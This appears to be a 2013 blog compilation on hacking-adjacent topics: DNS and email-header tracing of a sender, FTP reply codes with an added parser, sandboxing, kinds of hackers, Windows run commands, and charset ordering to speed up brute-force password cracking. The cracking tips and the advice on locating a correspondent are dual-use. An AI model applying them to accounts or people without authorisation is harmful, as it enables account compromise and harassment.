DNS stands for Domain Name System. DNS servers are machines connected to the Internet whose job it is to keep track of the IP addresses and domain names of other machines. When called upon, they take the ASCII domain name and convert it to the relevant numeric IP address. A forward DNS lookup translates a hostname into an IP address....which is why we can enter "" and get the website to come up, instead of having to actually remember Hotmail's IP address and enter that instead. Reverse DNS, of course, translates the IP address back into a hostname (in letters and words instead of numbers). Bear in mind that the reverse record is controlled by whoever owns the IP range, so it can be missing or deliberately misleading, which is one reason Netstat sometimes fails to show a sensible hostname. 

So, for example, is NOT a Hostname. IS a Hostname. 

Anyway, see the section at the end? (au) means the host is registered under Australia's country code. Many hostnames end in a country code like that, which narrows down your search, but generic endings (.com, .net) tell you nothing about location, and even a country code is the registrant's choice rather than proof of where the machine physically sits. If you know your target's email address (ie they foolishly sent you hate mail, but were silly enough to use a valid email address) but nothing else, then you can use the country codes to deduce where they're from as well. 

You can also deduce the IP address of the sender by looking at the email's header (a set of "hidden" lines at the top of the message which record the sender and every mail server that handled it)...on Hotmail for example, go to Preferences, and select the "Full Headers Visible" option. Alternatively, you can run a "Finger" trace on the email address, at: 

Plus, some ISPs include their name in the email addresses they hand out (ie Wanadoo, Supanet etc), and your hacker may be using an email account provided by a website hosting company, meaning the website host's name would probably appear in the email address (ie Webspawners). So, you could use the information gleaned to maybe even hunt down their website (then you could run a website check as mentioned previously), or report abuse of that website provider's email account (and thus, the website that goes with it) to 

FTP Error Codes

FTP Error Messages 

Some useful info about FTP reply codes so you know what they mean. You see them all the time and sometimes you don't know what they mean, so take a look here.

The most common codes: 

421 - often means: too many users logged in to the same account.
530 - wrong login/password; some servers switch to 530 instead of 421 when they reach the max number of users, so pay attention to the error message attached to the code, not just the number.
550 - common on ratio sites; if the file exists it means you have no access to the file or directory.

If you try changing directories on an FTP server and you get a 550
message, it means you don't have access to that directory.

It doesn't mean you don't have access to a directory inside that directory. (Meaning when you are given a direct path, log in and change into
the full path directly, not one directory at a time.)

All others: 

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection. Logged out if appropriate.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Service not available, closing control connection. (In practice servers often send this when they have reached their maximum number of users.)
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. File unavailable (e.g., file busy).
451 Requested action aborted: local error in processing.
452 Requested action not taken. Insufficient storage space in system.
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted: page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.
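A reply parser for the codes listed above, as an added example that is not part of the original post. It reads replies off an FTP control connection the way RFC 959 lays them out (a three-digit code, then either a space for a one-line reply or a hyphen for a multi-line one that ends at the next line carrying the same code and a space), classifies each code by its first and second digit, and applies the practical notes from the top of the section (421 versus 530 at a user limit, 550 on a CWD). The sample byte stream is constructed for the example, and the wording of the diagnoses is mine.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# RFC 959 reply-code structure: the first digit says whether to proceed,
# the second digit says what the reply is about.
FIRST_DIGIT = {
    1: "positive preliminary (wait for another reply)",
    2: "positive completion",
    3: "positive intermediate (send the next command in the sequence)",
    4: "transient negative (retry later)",
    5: "permanent negative (do not repeat the same command unchanged)",
}
SECOND_DIGIT = {
    0: "syntax",
    1: "information",
    2: "connections",
    3: "authentication and accounting",
    5: "file system",
}

REPLY_LINE_RE = re.compile(r"^(\d{3})([ -])(.*)$")


@dataclass
class FtpReply:
    code: int
    lines: List[str]

    @property
    def text(self) -> str:
        return "\n".join(self.lines)

    @property
    def kind(self) -> str:
        return FIRST_DIGIT.get(self.code // 100, "unknown")

    @property
    def category(self) -> str:
        return SECOND_DIGIT.get((self.code // 10) % 10, "unspecified")

    @property
    def transient(self) -> bool:
        return 400 <= self.code < 500


def parse_reply(buf: bytes) -> Optional[Tuple[FtpReply, bytes]]:
    """Take one reply off the front of a control-connection buffer.

    Returns (reply, remaining bytes), or None if the buffer does not yet hold
    a complete reply. Multi-line replies start with 'xyz-' and end at the
    next line that starts with 'xyz ' (same code, then a space).
    """
    rest = buf
    code = None
    lines: List[str] = []
    while True:
        nl = rest.find(b"\r\n")
        if nl < 0:
            return None  # incomplete: wait for more bytes
        raw, rest = rest[:nl], rest[nl + 2:]
        line = raw.decode("latin-1")  # replies are ASCII per RFC 959; latin-1 never fails
        m = REPLY_LINE_RE.match(line)
        if code is None:
            if not m:  # the first line of a reply must carry the code
                raise ValueError(f"malformed FTP reply line: {line!r}")
            code = int(m.group(1))
            lines.append(m.group(3))
            if m.group(2) == " ":
                return FtpReply(code, lines), rest
        elif m and int(m.group(1)) == code and m.group(2) == " ":
            lines.append(m.group(3))  # terminating line of a multi-line reply
            return FtpReply(code, lines), rest
        else:
            lines.append(line)  # free-text continuation line


def parse_all(buf: bytes) -> Tuple[List[FtpReply], bytes]:
    """Parse every complete reply in the buffer; return them plus any unfinished tail."""
    replies: List[FtpReply] = []
    while True:
        parsed = parse_reply(buf)
        if parsed is None:
            return replies, buf
        reply, buf = parsed
        replies.append(reply)


def diagnose(reply: FtpReply) -> str:
    """Apply the practical notes above: read the text, not just the code."""
    full = reply.text.lower()
    if reply.code == 421:
        return "service unavailable; with text like 'too many users' it is a connection limit, so wait and retry"
    if reply.code == 530:
        if "too many" in full:
            return "sent as 'not logged in' but the text shows a user limit, not a bad password; retry later"
        return "credentials rejected; check the user name and password"
    if reply.code == 550:
        return "no access to that file or directory (or it does not exist); a deeper path may still be reachable, so CWD to it directly"
    return f"{reply.kind}, {reply.category}"


# Constructed control-connection stream (not a real server capture).
SAMPLE_STREAM = (
    b"220-Welcome to the example FTP server\r\n"
    b"220 Service ready for new user.\r\n"
    b"331 User name okay, need password.\r\n"
    b"530 Sorry, too many users are logged in right now.\r\n"
    b"550 /pub/private: Permission denied.\r\n"
    b"226-Transfer statistics\r\n"  # unfinished multi-line reply: stays in the buffer
)

if __name__ == "__main__":
    replies, leftover = parse_all(SAMPLE_STREAM)
    for r in replies:
        print(r.code, "|", r.lines[-1], "|", diagnose(r))
    print("bytes still waiting for more data:", leftover)
```

The buffer-and-remainder shape matters when you write your own client: a server is free to split one reply across several TCP segments or to send several replies in one, so the parser must never assume a read() boundary is a reply boundary, and must keep the unfinished 226- tail around until the terminating "226 " line arrives.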

Thursday, June 6, 2013

Sand Box

What is sand box?

A sandbox is a security mechanism for separating running programs. It is often used to execute untested code, or untrusted programs from unverified third parties, suppliers, untrusted users and untrusted websites.

The sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as scratch space on disk and memory. Network access, the ability to inspect the host system or read from input devices are usually disallowed or heavily restricted.


Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.

In Sandboxie's own illustration, the red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.

Benefits of the Isolated Sandbox
  1. Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.
  2. Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.
  3. Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.
  4. Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.

Tuesday, June 4, 2013

Types Of Hackers

Hacker: a person who accesses a computer resource without authorization, uses his or her skills to commit unlawful acts, or deliberately creates mischief.

There are six types of hackers:


The real hackers are the Coders, the ones who devise the methods and create the tools that everyone else uses. Coders can find security holes and weaknesses such as buffer overflows in software and write their own exploits.

Admins are the computer people who use the tools and exploits prepared by the coders. They do not develop their own techniques; they use the tricks already prepared by the coders. They are generally system administrators or network administrators. Most hackers and security people in the digital world come under this category.


Script Kiddies are the bunnies who use scripts and programs developed by others to attack computer systems and networks. They get the least respect but are the most annoying and dangerous, and can cause big problems without actually knowing what they are doing.

A White Hat Hacker is a computer person who performs ethical hacking. These are usually security professionals with knowledge of hacking and the hacker toolset, who use this knowledge to locate security weaknesses and implement countermeasures. They are also known as Ethical Hackers or Penetration Testers. They focus on securing and protecting IT systems.

A Black Hat Hacker is a computer person who performs unethical hacking. These are the criminal hackers or crackers who use their skills and knowledge for illegal or malicious purposes. They break into or otherwise violate the system integrity of remote machines, with malicious intent. They are also known as Unethical Hackers or Security Crackers. They focus on security cracking and data stealing.

A Grey Hat Hacker is a computer person who sometimes acts legally, sometimes in good will, and sometimes not. They usually do not hack for personal gain or have malicious intentions, but may occasionally commit crimes during the course of their technological exploits. They are a hybrid between White Hat and Black Hat Hackers.

Common Run Command

compmgmt.msc = computer management
certmgr.msc = certificate manager
diskmgmt.msc = disk management
devmgmt.msc = device manager
eventvwr.msc = event viewer
fsmgmt.msc = share folder manager
gpedit.msc = group policy editor
lusrmgr.msc = local users and groups
ntmsmgr.msc = removable storage
ntmsoprq.msc = removable storage operator requests
perfmon.msc = performance monitor
rsop.msc = resultant set of policy
secpol.msc = local security settings
services.msc = services
wmimgmt.msc = windows management instrumentation

conf = netmeeting
calc = calculator
clipbrd = clipbook viewer
charmap = character mapping table
chkdsk.exe = check disk
cmd = command prompt
cleanmgr = clean disk
dxdiag = check DirectX information
dcomcnfg = component services
eudcedit = private character editor
logoff = logoff
mem.exe = memory usage
msconfig.exe = system configuration
mplayer2 = windows media player
mspaint = paint
mstsc = remote desktop
magnify = magnify
mmc = microsoft management console
mobsync = synchronize setting
notepad = notepad
ntbackup = backup or restore wizard
narrator = narrator
osk = on screen keyboard
odbcad32 = ODBC data source administrator
packager = object packager
regedit.exe = registry
rononce -p = shutdown (15secs)
regedt32 = registry editor
sysedit = system configuration editor
sigverif = file signature verification
sndrec32 = sound recorder
shrpubw = create shared folder wizard
syskey = encrypt windows
Sndvol32 = volume control
sfc.exe = resource checker
tsshutdn = shutdown (60secs)
taskmgr = task manager
tourstart = xp tour
utilman = ease of access center
winchat = windows chat
winver = check windows version
winmsd = check system information
wupdmgr = windows update manager
wscript = windows script host
write = word pad

Control userpasswords2
Control access.cpl
Control appwiz.cpl
Control bthprops.cpl
Control desk.cpl
Control hdwwiz.cpl
Control inetcpl.cpl
Control firewall.cpl
Control intl.cpl
Control irprops.cpl
Control joy.cpl
Control main.cpl
Control mmsys.cpl
Control ncpa.cpl
Control netsetup.cpl
Control nusrmgr.cpl
Control nvtuicpl.cpl
Control odbccp32.cpl = ODBC data source administrator
Control powercfg.cpl
Control sysdm.cpl
Control telephon.cpl
Control timedate.cpl
Control wscui.cpl = Windows Security Center
Control wuaucpl.cpl

shell:Common Administrative Tools
shell:Administrative Tools
shell:SystemX86 System32
shell:My Pictures
shell:Profile %userprofile%
shell:ProgramFiles %programfiles%
shell:Windows %windir%
shell:Local AppData
shell:Common Documents
shell:Common Templates
shell:Common AppData
shell:Common Favorites
shell:Common Desktop
shell:Common Menu
shell:Common Programs
shell:Common Startup
shell:ControlPanelFolder Control

Monday, June 3, 2013

Enhance Brute Force Attack Charset

Choosing a custom charset of 0123456789abcdefghijklmnopqrstuvwxyz, you'll get passwords that end in digits much faster than with the standard a-z0-9 charset. With a charset of a-z0-9, the cracking program tries aaaaaaa, baaaaaa, caaaaaa and so on: the first position changes fastest and the last position changes slowest, so the last character is the one that decides how far into the run a password sits.

But with 0-9a-z, the program tries 0000000, 1000000, 2000000 and so on, so you get the passwords with numbers at the end first. In other words, whereas the default numbers-last charset only reaches the passwords with numbers at the end after almost the maximum time, a custom charset with numbers first starts with them. It's not much but I find it does help.

Another common technique is to use eatoinsrhldcumfpgwybvkxjqz instead of abcdefghijklmnopqrstuvwxyz.

Everyone knows that 'e' is the most commonly used letter in the English language, so it makes sense to try it before the less commonly used letters. In fact, 'j', 'q' and 'z' are so uncommon, I sometimes leave them off the list altogether since it makes such a significant improvement on cracking time.
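A worked version of the charset-ordering argument above, as an added example that is not part of the original post. It enumerates candidates in the order described (first position varying fastest) and computes, without enumerating, how many attempts a given password costs under the a-z0-9 charset, the 0-9a-z charset and the post's frequency ordering; it also shows what happens when j, q and z are dropped. The passwords used are made up for the example, and the fixed-length enumeration (no shorter lengths first) is an assumption that keeps the arithmetic exact.

```python
from itertools import product
from typing import Iterator, Optional

DEFAULT_CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"  # the usual a-z0-9
DIGITS_FIRST = "0123456789abcdefghijklmnopqrstuvwxyz"    # the post's 0-9a-z
FREQ_ORDER = "eatoinsrhldcumfpgwybvkxjqz"                 # the post's frequency ordering


def candidates(charset: str, length: int) -> Iterator[str]:
    """Every string of exactly `length` over `charset`, first position varying fastest (aaaa, baaa, caaa, ...)."""
    for combo in product(charset, repeat=length):
        yield "".join(reversed(combo))  # product varies the last slot fastest; flip it


def attempts_until(password: str, charset: str) -> Optional[int]:
    """1-based position of `password` in candidates(charset, len(password)), computed directly.

    With the first position varying fastest, position i carries weight len(charset)**i,
    so the last character is the most significant one: a password whose last character
    sits near the end of the charset is tried near the end of the run. Returns None if
    the password uses a character the charset lacks (it would never be found at all).
    """
    base = len(charset)
    rank = 0
    for i, ch in enumerate(password):
        idx = charset.find(ch)
        if idx < 0:
            return None
        rank += idx * base ** i
    return rank + 1


def without(charset: str, dropped: str) -> str:
    """Charset with some characters removed, as the post does for j, q and z."""
    return "".join(c for c in charset if c not in dropped)


if __name__ == "__main__":
    # Made-up passwords (assumption for the example).
    for pw in ("abc1", "1abc"):
        print(pw, "a-z0-9:", attempts_until(pw, DEFAULT_CHARSET),
              "0-9a-z:", attempts_until(pw, DIGITS_FIRST))
    print("quiz with j/q/z dropped:", attempts_until("quiz", without(FREQ_ORDER, "jqz")))
```

The numbers make the trade-off explicit: "abc1" moves from attempt 1262341 to attempt 62615 when digits go first, but "1abc" moves the other way, from 94636 to 574490, because reordering the charset changes which passwords come first, not how many there are. Likewise, dropping j, q and z shrinks the space by about a third per position but guarantees that any password containing those letters is never found, so it is a bet on the target, not a free speed-up.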

Sunday, June 2, 2013

Google Hacks

Almost every internet user would recognize one of the most popular search engines, "GOOGLE". By utilizing the various search operators that Google already provides, we can make our search results more accurate. An application named "Google Hacks" exists to help users get at that search functionality more easily.

What is Google Hacks? Google Hacks is an open source application that can be used as an aid in searching through Google. Searching for music, ebooks, videos, product keys, lyrics and fonts is part of the basic search function of this program. Enter keywords and click the options provided; Google Hacks then weaves the keywords together with search operators and displays Google's results page in the browser. If we are lucky, we get what we are looking for.
What is Google Hack? Google Hacks is an open source application that can be used as an aid in searching through Google. Search music, ebooks, videos, product key, the lyrics, the font is part of the basic search function to do with this program. Enter keywords and click the options provided, then Google Hacks will weave keywords with search operators and displays Google results pages through the browser. If we are lucky, we will get what we are looking for.